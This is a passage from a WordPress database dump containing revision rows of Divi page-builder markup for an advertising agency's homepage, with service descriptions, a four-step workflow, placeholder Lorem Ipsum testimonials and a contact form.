text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:40:59','2020-08-07 14:40:59','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(483,1,'2020-08-07 14:42:14','2020-08-07 14:42:14','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" 